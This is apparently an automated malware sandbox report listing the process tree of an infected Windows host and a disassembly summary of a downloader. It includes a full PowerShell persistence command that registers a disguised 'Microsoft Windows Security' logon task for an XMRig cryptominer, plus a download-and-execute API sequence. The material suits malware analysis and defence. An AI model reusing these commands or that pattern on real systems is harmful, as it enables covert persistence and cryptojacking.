                                                                                                                                                                                                    Imagebase:0x7ff6a6430000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                    Start time:01:26:51
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                    Start time:01:26:51
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                                                                                    Imagebase:0x7ff6a6430000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                    Start time:01:26:51
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                    Start time:01:26:51
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                                                                                    Imagebase:0x7ff67ca30000
                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                    Start time:01:26:51
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                                                                                    Imagebase:0x7ff6dfe60000
                                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                    Start time:01:26:59
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\2573513776.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\2573513776.exe
                                                                                                                                                                                                    Imagebase:0x7e0000
                                                                                                                                                                                                    File size:15'872 bytes
                                                                                                                                                                                                    MD5 hash:0C37EE292FEC32DBA0420E6C94224E28
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 58%, ReversingLabs
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                    Start time:01:27:08
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\28849683.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\28849683.exe
                                                                                                                                                                                                    Imagebase:0x410000
                                                                                                                                                                                                    File size:10'240 bytes
                                                                                                                                                                                                    MD5 hash:96509AB828867D81C1693B614B22F41D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                    Start time:01:27:16
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\15714163.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\15714163.exe
                                                                                                                                                                                                    Imagebase:0x10000
                                                                                                                                                                                                    File size:13'312 bytes
                                                                                                                                                                                                    MD5 hash:5A0D146F7A911E98DA8CC3C6DE8ACABF
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 55%, ReversingLabs
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                    Start time:01:27:19
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1428024550.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\1428024550.exe
                                                                                                                                                                                                    Imagebase:0x7ff68e160000
                                                                                                                                                                                                    File size:5'827'584 bytes
                                                                                                                                                                                                    MD5 hash:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                    Start time:01:27:24
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                    Start time:01:27:24
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                    Start time:01:27:32
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                                                    Imagebase:0x7ff6687e0000
                                                                                                                                                                                                    File size:5'827'584 bytes
                                                                                                                                                                                                    MD5 hash:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmp, Author: unknown
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                    Start time:01:27:37
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                    Start time:01:27:37
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                    Start time:01:27:49
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                    Start time:01:27:49
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                    Start time:01:27:49
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                    Start time:01:27:50
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\dwm.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\dwm.exe
                                                                                                                                                                                                    Imagebase:0x7ff7751a0000
                                                                                                                                                                                                    File size:94'720 bytes
                                                                                                                                                                                                    MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000029.00000002.2908746013.000002595CEF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000029.00000003.2355184537.000002595CF00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                    Start time:01:28:10
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                                                    Imagebase:0x7ff6687e0000
                                                                                                                                                                                                    File size:5'827'584 bytes
                                                                                                                                                                                                    MD5 hash:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                                    Start time:01:28:16
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:47
                                                                                                                                                                                                    Start time:01:28:16
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:37.1%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:40%
                                                                                                                                                                                                      Total number of Nodes:95
                                                                                                                                                                                                      Total number of Limit Nodes:2
                                                                                                                                                                                                      execution_graph 268 a914a9 _XcptFilter 269 a912e9 274 a916f5 269->274 272 a9132e 273 a91326 _amsg_exit 273->272 277 a91650 274->277 276 a912ee __getmainargs 276->272 276->273 284 a918bc 277->284 279 a9165c _decode_pointer 280 a9167f 7 API calls 279->280 281 a91673 _onexit 279->281 285 a916ec _unlock 280->285 283 a916e3 __onexit 281->283 283->276 284->279 285->283 306 a915f9 307 a91635 306->307 309 a9160b 306->309 308 a91630 ?terminate@ 308->307 309->307 309->308 310 a91a38 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 311 a91b2a GetCurrentProcess TerminateProcess 310->311 312 a91b22 _crt_debugger_hook 310->312 312->311 313 a914bd 314 a914d8 313->314 315 a914d1 _exit 313->315 316 a914e1 _cexit 314->316 317 a914e7 __onexit 314->317 315->314 316->317 210 a9132f 228 a918bc 210->228 212 a9133b GetStartupInfoA 213 a91369 212->213 214 a9137b 213->214 215 a91382 Sleep 213->215 216 a9139b _amsg_exit 214->216 217 a913a5 214->217 215->213 218 a913ce 216->218 217->218 219 a913ae _initterm_e 217->219 221 a913dd _initterm 218->221 222 a913f8 __IsNonwritableInCurrentImage 218->222 219->218 220 a913c9 __onexit 219->220 221->222 223 a91493 _ismbblead 222->223 225 a914d8 222->225 226 a9147d exit 222->226 229 a91061 Sleep 222->229 223->222 225->220 227 a914e1 _cexit 225->227 226->222 227->220 228->212 262 a91000 strlen 229->262 232 a9110f 234 a91000 4 API calls 232->234 233 a912c0 233->222 235 a91118 LoadLibraryA 234->235 235->233 236 a91127 235->236 237 a91000 4 API calls 236->237 238 a91130 LoadLibraryA 237->238 238->233 239 a9113f 238->239 240 a91000 4 API calls 239->240 241 a91148 LoadLibraryA 240->241 241->233 242 a91157 241->242 243 a91000 4 API calls 242->243 244 a91160 GetProcAddress 243->244 244->233 245 a91178 244->245 246 a91000 4 API calls 245->246 247 a91181 GetProcAddress 246->247 247->233 248 a91193 247->248 249 a91000 4 API calls 248->249 250 a9119c GetProcAddress 249->250 250->233 251 a911ae 250->251 252 a91000 4 API calls 251->252 253 a911b7 GetProcAddress 252->253 253->233 254 a911c9 GetTickCount srand 253->254 255 a911eb wsprintfW PathFileExistsW 254->255 256 a9121b rand wsprintfW 255->256 257 a912a6 FreeLibrary FreeLibrary FreeLibrary FreeLibrary 255->257 259 a91000 4 API calls 256->259 257->233 260 a9125d strlen mbstowcs URLDownloadToFileW 259->260 260->257 261 a91293 ShellExecuteW 260->261 261->257 263 a91024 262->263 267 a9105a LoadLibraryA 262->267 264 a91025 strlen 263->264 265 a9104b strlen 264->265 266 a91035 strlen 264->266 265->264 265->267 266->265 266->266 267->232 267->233 286 a915ef 289 a91968 286->289 288 a915f4 288->288 290 a9199a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 289->290 291 a9198d 289->291 292 a91991 290->292 291->290 291->292 292->288 293 a9150e 294 a9151c __set_app_type _encode_pointer __p__fmode __p__commode 293->294 296 a915bb _pre_c_init __RTC_Initialize 294->296 297 a915c9 __setusermatherr 296->297 298 a915d5 296->298 297->298 303 a9193a _controlfp_s 298->303 301 a915ec 302 a915e3 _configthreadlocale 302->301 304 a915da 303->304 305 a91956 _invoke_watson 303->305 304->301 304->302 305->304 318 a91915 _except_handler4_common

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00A91061 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 229libraryloadersleepCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Sleep.KERNELBASE(00000BB8), ref: 00A91074
                                                                                                                                                                                                        • Part of subcall function 00A91000: strlen.MSVCR90 ref: 00A9101A
                                                                                                                                                                                                        • Part of subcall function 00A91000: strlen.MSVCR90 ref: 00A9102B
                                                                                                                                                                                                        • Part of subcall function 00A91000: strlen.MSVCR90 ref: 00A91041
                                                                                                                                                                                                        • Part of subcall function 00A91000: strlen.MSVCR90 ref: 00A91050
                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(00000000), ref: 00A91100
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 00A9111A
                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(00000000), ref: 00A91132
                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(00000000), ref: 00A9114A
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00A9116B
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00A91186
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00A911A1
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00A911BC
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00A911C9
                                                                                                                                                                                                      • srand.MSVCR90 ref: 00A911D0
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00A91204
                                                                                                                                                                                                      • PathFileExistsW.KERNELBASE(?), ref: 00A91210
                                                                                                                                                                                                      • rand.MSVCR90 ref: 00A9122B
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00A91252
                                                                                                                                                                                                      • strlen.MSVCR90 ref: 00A91261
                                                                                                                                                                                                      • mbstowcs.MSVCR90 ref: 00A91273
                                                                                                                                                                                                      • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00A9128C
                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00A912A3
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00A912AF
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00A912B4
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00A912B9
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00A912BE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1534583432.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1534567960.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1534617530.0000000000A92000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1534631362.0000000000A93000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1534669402.0000000000AA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1534683064.0000000000AA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_a90000_lJ4EzPSKMj.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Library$strlen$AddressFreeLoadProc$Filewsprintf$CountDownloadExecuteExistsPathShellSleepTickmbstowcsrandsrand
                                                                                                                                                                                                      • String ID: %s\%d.scr$%s\tbtnds.dat$%temp%$%userprofile%$open
                                                                                                                                                                                                      • API String ID: 185184987-1677019907
                                                                                                                                                                                                      • Opcode ID: 58dabd5634d3a95012a3656e7a026532383c984a7ad1176d31d9c96219d37fd7
                                                                                                                                                                                                      • Instruction ID: ceb099b56fc8d0c0dadc04105ccf53addd8a9e84e7e868eb3564d01527c1abf0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58dabd5634d3a95012a3656e7a026532383c984a7ad1176d31d9c96219d37fd7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03611C72A1021DABDF11EFA0DD45ADF37EDAF05350F140966FA05E7000DAB5AE598BA0

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 00A91000 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 48stringCOMMON
                                                                                                                                                                                                      Download Yara Rule

